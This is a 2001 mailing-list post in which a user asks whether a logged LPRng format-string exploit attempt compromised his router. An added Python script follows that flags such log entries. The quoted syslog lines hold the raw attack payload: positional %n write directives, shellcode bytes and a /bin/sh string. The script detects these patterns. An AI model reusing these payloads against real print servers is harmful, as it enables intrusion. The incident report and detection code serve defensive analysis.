On Thu, 22 Nov 2001 12:06:21 Thomas Amm wrote:

Hi all,

That's what I found in my logs after I had to reboot my router, which also worked as print server (now I know better), because of a DoS.

Nov 21 03:29:36 lan1 -- MARK --
Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line 'BB����������������XXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u %303$n1�1�1��F��1Ҳf�1��C]�C]�KM�M��1�E�Cf]�f�E�^O'M�E�E��E�^P�M���CC��C��1ɲ?�� �A��^X^u^H1�F^GE^L�^K�M^HU^L������/bin/sh'
Nov 21 03:32:10 lan1 SERVER[2758]: Dispatch_input: bad request line 'BB(���)���*���+���XXXXXXXXXXXXXXXXXX%.232u%300$n%.199u%301$nsecurity.i%302$n%.1 92u%303$n1�1�1��F��1Ҳf�1��C]�C]�KM�M��1�E�Cf]�f�E�^O'M�E�E��E�^P�M���CC��C��1ɲ ?���A��^X^u^H1�F^GE^L�^K�M^HU^L������/bin/sh'
Nov 21 03:32:11 lan1 SERVER[2759]: Dispatch_input: bad request line 'BBH

(and so on) - the lpr.log shows the same entries.

I searched the system for fragments of the Ramen worm after reboot but I found nothing suspicious. The attack seemed to come over nmbd, although all ports except inetd are blocked to the outside via ipchains. I had a number of rejected packets to port 137 immediately before, nmbd crashed and the lprng exploit started.

So there are some questions I would like to pose:

Is Woody's lprng still vulnerable? I've got the latest version.
Is the shown exploit a sign that someone already was in there, or just for an attempt?
Can I find possible backdoors, or will I have to re-install?

Thanks,

--
Things are more like they are today than they ever were before.
-- Dwight Eisenhower
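An added example, not from the post or from LPRng, showing how a defender could pull these "Dispatch_input: bad request line" entries out of syslog and flag them as format-string write attempts: a `%<n>$n` directive makes printf write the number of bytes emitted so far through positional argument n, and the `%.<width>u` padding in front of it controls that count. The log lines below are constructed to mirror the post, with the binary shellcode bytes left out; the syslog field layout and the regular expressions are assumptions of this example.

```python
import re

# Constructed sample lines modelled on the post; the raw shellcode bytes are omitted.
SAMPLE_LOG = """\
Nov 21 03:29:36 lan1 -- MARK --
Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%303$n/bin/sh'
Nov 21 03:32:10 lan1 SERVER[2758]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.232u%300$n%.199u%301$nsecurity.i%302$n%.192u%303$n/bin/sh'
Nov 21 03:40:00 lan1 SERVER[2760]: Dispatch_input: bad request line 'GET / HTTP/1.0'
"""

# Classic BSD syslog prefix: "Mon dd hh:mm:ss host prog[pid]: message" (assumed layout).
SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) (?P<prog>\w+)\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
BAD_REQ_RE = re.compile(r"Dispatch_input: bad request line '(?P<req>.*)'$")
# %<n>$n: printf writes the running byte count through positional argument n (the write primitive).
WRITE_RE = re.compile(r"%(\d+)\$n")
# %.<width>u: zero-padded integer output used to steer the byte count before each write.
PAD_RE = re.compile(r"%\.(\d+)u")


def analyse_line(line):
    """Return a dict for LPRng bad-request entries, or None for other syslog lines."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    b = BAD_REQ_RE.search(m["msg"])
    if not b:
        return None
    req = b["req"]
    writes = [int(x) for x in WRITE_RE.findall(req)]
    return {
        "ts": m["ts"],
        "pid": int(m["pid"]),
        "format_string_attack": bool(writes),   # any positional %n is a write attempt
        "write_args": writes,                    # which stack slots it tried to write through
        "pad_widths": [int(x) for x in PAD_RE.findall(req)],
        "shell_marker": "/bin/sh" in req,        # payload carried a shell path
    }


def scan(log_text):
    """Return only the entries that look like format-string write attempts."""
    results = (analyse_line(l) for l in log_text.splitlines())
    return [r for r in results if r and r["format_string_attack"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Several such hits in quick succession from one daemon, as in the post, are worth treating as an exploitation attempt regardless of whether the service actually crashed.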

